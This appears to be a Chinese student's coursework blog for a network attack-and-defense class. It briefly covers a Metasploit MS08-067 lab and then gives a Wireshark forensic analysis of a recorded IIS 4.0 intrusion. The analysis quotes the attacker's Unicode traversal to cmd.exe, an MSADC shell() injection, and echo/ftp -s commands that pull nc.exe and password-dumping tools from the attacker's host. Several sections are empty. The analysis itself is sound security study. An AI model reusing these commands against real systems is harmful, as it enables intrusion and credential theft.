20253902 吴晨宇 2025-2026-2 《网络攻防实践》第六周作业

知识点总结

get和post请求的区别

操作流程

2.1 渗透测试

2.1.1 检查windows端口情况

通过netstat -an查看
image

查看端口nmap -n -p 445 192.168.200.21
image

winver
image

2.1.2 加载msf

search ms08-067
image

image

image

image

image
可以正常读写

分析流量

这里,我们通过时间线进行分析,通过流量顺序还原攻击者的攻击画像

初步感知

通过视图-专家信息,初步感知
image
该攻击行为已导致目标系统出现严重的TCP协议异常,包括主动中断连接、接收窗口阻塞及大量重传。此外,Wireshark解析过程中出现的“HTTP body subdissector failed”错误提示,进一步表明漏洞可能已被成功触发

确认攻击者和受害者 IP

攻击者 IP:212.116.251.162
受害者 IP:172.16.1.106
受害主机名:lab.wiretrip.net

过滤流量,通过 Wireshark 的 Conversations 统计和 IP 过滤,发现 212.116.251.162 与 172.16.1.106 之间存在大量 HTTP、FTP 及交互式 TCP 通信。结合题目背景和后续攻击行为,判定 212.116.251.162 为攻击者,172.16.1.106 为受害主机。
image

发现get型请求
image

过滤get型请求
image

可以发现有大量目录遍历的请求
image

分析 Web 访问和 IIS 指纹

攻击者先做了一步信息搜集

确认攻击者首先访问了 Web 服务,并识别目标服务器类型。可以在wireshark中过滤http.request
image

右键追踪tcp流
image

攻击者首先访问目标首页 /,服务器返回 HTTP 200 OK,并在响应头中暴露 Server: Microsoft-IIS/4.0。由此可判断目标运行 IIS/4.0,属于后续 MSADC/RDS 和 Unicode 目录穿越攻击的潜在目标。

发现 /msadc/msadcs.dll 探测

/msadc/msadcs.dll 是 Microsoft RDS / MDAC 相关组件。老版本 IIS + MDAC 环境中,这个组件经常被用于远程命令执行攻击。根据刚刚的浏览和上一步的分析,我们可以通过http.request.uri contains "msadc" 过滤相关流量
image

追踪流发现,服务器对该路径有响应,表明该组件可访问,为后续 AdvancedDataFactory.Query 利用创造了条件。
image

发现 AdvancedDataFactory.Query 利用

在 HTTP 流量中发现 POST /msadc/msadcs.dll/AdvancedDataFactory.Query
image

可以看到,请求内容类型为 application/x-varg。该请求是典型的 RDS DataFactory 利用特征,说明攻击者尝试通过 MSADC/RDS 组件在服务器端执行恶意操作。往下分析,可以看到sql注入的内容,
image
其逻辑是先利用 | 管道符闭合或中断原有的 SQL 上下文,然后直接调用 shell() 函数执行操作系统命令 —— 在当前目录下创建一个名为 ftp.com2 的文件,并写入 FTP 登录凭据。紧随其后的 driver={Microsoft Access Driver (*.mdb)};dbq=c:\winnt\help\iis\html\tutorial\btcustmr.mdb 则试图附加一个合法的 Access 数据库路径来满足查询语法的完整性。最终的服务器响应(HTTP/1.1 200 OK 和 multipart/mixed 数据)表明该注入逻辑已成功触发,攻击者正在尝试通过后续的 FTP 命令外传数据。

发现 Unicode 目录穿越调用 cmd.exe

http.request.uri contains "cmd.exe"
image

%C0%AF 或 À¯ 代表经过 Unicode 编码绕过的 /
image

攻击者通过多级目录穿越跳出 Web 目录,访问:C:\WINNT\system32\cmd.exe,并通过:?/c+,让 cmd.exe 执行后面的系统命令。

通过过滤 cmd.exe 和 %C0%AF,发现攻击者构造 Unicode 编码目录穿越路径,访问 C:\WINNT\system32\cmd.exe,并通过 /c 参数执行系统命令。这表明攻击者已能够借助 IIS Unicode 目录穿越漏洞在目标系统上执行命令。

发现复制 cmd.exe 为 cmd1.exe

攻击者利用 cmd.exe 执行 copy 命令,将 C:\WINNT\system32\cmd.exe 复制到 msadc 目录并命名为 cmd1.exe。后续攻击者可通过 Web 请求直接调用 cmd1.exe 执行命令,降低了继续利用目录穿越的复杂度。

确认攻击者为后续持久执行命令,复制系统命令解释器到 Web 可访问目录。frame contains "cmd1.exe"
image

还原为系统命令copy C:\winnt\system32\cmd.exe cmd1.exe,这说明攻击者将原始 cmd.exe 复制为:C:\Program Files\Common Files\System\msadc\cmd1.exe,后续攻击者就不必每次都调用复杂的 Unicode 穿越路径,而是直接访问:/msadc/.../program files/common files/system/msadc/cmd1.exe?/c+命令

发现构造 ftpcom 脚本

<攻击者通过多次 HTTP 请求调用 cmd1.exe,使用 echo 命令逐行构造 ftpcom 文件。ftpcom 中包含连接攻击者 FTP 服务器以及下载 nc.exe、pdump.exe、samdump.dll 等工具的指令。随后攻击者执行 ftp -s:ftpcom,使受害主机主动连接攻击者服务器下载工具。

image
echo open 212.116.251.162 > ftpcom
表示创建 FTP 脚本。
echo get nc.exe >> ftpcom
表示向脚本追加下载命令。
ftp -s:ftpcom
表示让 Windows FTP 客户端自动执行脚本。
日志中可以看到攻击者通过 cmd1.exe 向 ftpcom 写入 get samdump.dll 等命令;目录列表中也出现了 ftpcom 文件。

发现 FTP 下载 nc.exe、pdump.exe、samdump.dll

过滤ftp
image

追踪流可以看到在通过ftp下载脚本,retr全称是 "Retrieve"(检索)。它的主要作用就是从FTP服务器上下载文件到本地客户端
image

文件名 功能描述
nc.exe Netcat,用于建立远程 shell
pdump.exe NT/Windows 密码哈希导出工具
samdump.dll 配合 pdump/pwdump 类工具读取 SAM 哈希

FTP 流量表明受害主机主动连接攻击者 212.116.251.162 的 FTP 服务,并下载 nc.exe、pdump.exe、samdump.dll 等工具。随后在 C:\Program Files\Common Files\System\msadc 目录中发现这些文件,证明攻击者已成功向目标系统投放后续控制和凭据窃取工具。

发现 Netcat 远程 shell

通过Statistics → Conversations → TCP,查找长时间的连接,按照时间长度倒序排序
image

Netcat 不一定使用固定端口,所以可以找一些非80、21这种常用端口,经过简单浏览,可以初步锁定
image

分析攻击者执行的系统命令

判断攻击者是否发现蜜罐

提出防护措施

攻击

image

遇到的问题

心得体会

posted @ 2026-04-24 22:34  20253902吴晨宇  阅读(7)  评论(0)    收藏  举报